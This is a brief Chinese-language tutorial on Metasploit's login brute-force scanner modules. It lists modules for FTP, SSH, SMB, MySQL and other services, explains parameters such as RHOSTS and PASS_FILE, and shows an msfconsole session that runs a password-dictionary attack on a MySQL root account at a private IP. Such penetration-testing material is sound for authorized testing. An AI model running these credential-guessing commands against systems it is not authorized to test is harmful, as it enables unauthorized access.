metasploit穷举模块

目录

工具介绍

常用模块

参数介绍

工具使用

---

工具介绍

Metasploit框架(Metasploit Framework, MSF)是一个开源工具， 旨在方便渗透测试，它是由Ruby程序语言编写的模板化框架，具有很好的扩展性，便于渗透测试人员开发、使用定制的工具模板。

常用模块

auxiliary/scanner/ftp/ftp_login

auxiliary/scanner/ssh/ssh_login

auxiliary/scanner/telnet/telnet_login

auxiliary/scanner/smb/smb_loginauxiliary/scanner/mssql/mssql_login

auxiliary/scanner/mysql/mysql_login

auxiliary/scanner/oracle/oracle_login

auxiliary/scanner/postgres/postgres_login

auxiliary/scanner/vnc/vnc_login

auxiliary/scanner/pcanywhere/pcanywhere_login

auxiliary/scanner/snmp/snmp_login

参数介绍

RHOSTS 攻击的目标
PASS_FILE 密码字典
STOP_ON_SUCCESS 成功破解一个终止
THREADS 线程数
set 设置参数

示例

	msfconsolemsf5 > use auxiliary/scanner/mysql/mysql_loginmsf5 auxiliary(mysql_login) > set PASS_FILE /root/xhydra/pass.txtmsf5 auxiliary(mysql_login) > set USERNAME rootmsf5 auxiliary(mysql_login) > set RHOSTS 192.168.10.134msf5 auxiliary(mysql_login) > run# set 设置# show options 查询设置# back 返回# info 查询模块的信息# exploit/run 运行模块

工具使用

启动

msfconsole

搜索 

search mssql_login

使用

 search smb_login

use auxiliary/scanner/smb/smb_login

show options

配置选项

run